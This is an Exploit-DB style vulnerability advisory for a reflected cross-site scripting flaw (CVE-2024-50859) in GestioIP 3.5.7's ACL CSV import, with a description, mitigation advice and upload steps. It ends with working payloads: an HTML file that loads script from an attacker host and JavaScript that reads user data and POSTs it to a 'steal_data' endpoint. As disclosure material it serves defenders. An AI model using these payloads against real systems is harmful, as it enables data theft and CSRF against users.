GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)

vendor:

GestioIP

by:

m4xth0r (Maximiliano Belino)

6.1

CVSS

HIGH

Reflected Cross-Site Scripting (Reflected XSS)

CWE

Product Name: GestioIP

Affected Version From: 3.5.2007

Affected Version To: 3.5.2007

Patch Exists: NO

Related CWE: CVE-2024-50859

CPE: gestioip:gestioip:3.5.7

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2025

GestioIP 3.5.7 – Reflected Cross-Site Scripting (Reflected XSS)

The ip_import_acl_csv request in GestioIP 3.5.7 allows for Reflected Cross-Site Scripting (XSS) where uploaded file content is reflected in the HTML response without proper sanitation. If the uploaded file has an incorrect format leading to an error during processing, parts of the file's content may be displayed in the browser. If this content contains HTML or scripts and is not escaped correctly, browsers may interpret it, potentially causing a security issue like data exfiltration and enabling Cross-Site Request Forgery (CSRF) attacks. Proper input validation and output encoding are crucial to mitigate this vulnerability.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and output encoding to sanitize user-uploaded files and prevent the execution of malicious scripts. Additionally, ensuring that uploaded files are of the correct format and handling errors gracefully can help prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859

### Description

The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.


### Prerequisites

Enable (set to 'yes') the parameter:

Manage > Manage GestioIP > ACL connection management


### Usage

Select: import/export > Import ACLs/ACL Connections

Select: "Connection List"

Select "report only"

Browse to select the file you want to upload.

Click 'upload'



### Payloads

#### 1) html file to upload

<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>


#### 2) js file to exfiltrate data

var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();

response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);